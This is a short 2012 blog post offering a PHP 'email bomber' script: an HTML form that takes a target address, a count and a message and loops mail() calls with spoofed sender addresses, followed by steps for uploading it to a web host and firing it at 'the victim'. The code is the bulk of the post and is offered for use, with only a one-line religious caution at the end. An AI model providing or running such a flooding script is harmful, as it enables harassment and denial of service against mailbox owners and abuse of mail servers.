• RSS
  • Facebook
  • Twitter
  • Linkedin

Monday, 2 July 2012

Script BOM E-Mail PHP


I will discuss about how to send an email to the thousands just to send a one-time only. Here I use the email bomb script.

The following example program snippet:


<html>
<body>
<form method=post action=index.php>
<pre>
<input type=hidden value=ok name=ok>
From : <input name=dari value=”<? echo $dari;?>”>
To : <input name=kepada value=”<? echo $kepada;?>”>
Amount : <input name=jumlah value=”<? echo $jumlah;?>”>
Message: <textarea name=isi><?echo $isi?></textarea><br>
<input type=submit value=Booom>
</form></pre>
<?
if ($ok==”ok”)
{
for ($i=0;$i<$jumlah;$i++)
{
$a=$i.$dari;
mail($kepada,$isi,”",”From : $a <$a>”);
}
echo (“Beres Bos”);
}
?>
</body>
</html>
Then save the code in a file, for example email-bomber.php

Then enter the file in your webserver or webhosting.

The next step is open a browser and enter the address where you saved the file for example http://yourdomain.com/email-bomber.php

If the e-mail addresses that addressed right then it will automatically send email messages to the victim.

Last message should not be done because God is omniscient and ask if there is one word in excuse.

0 comments:

Post a Comment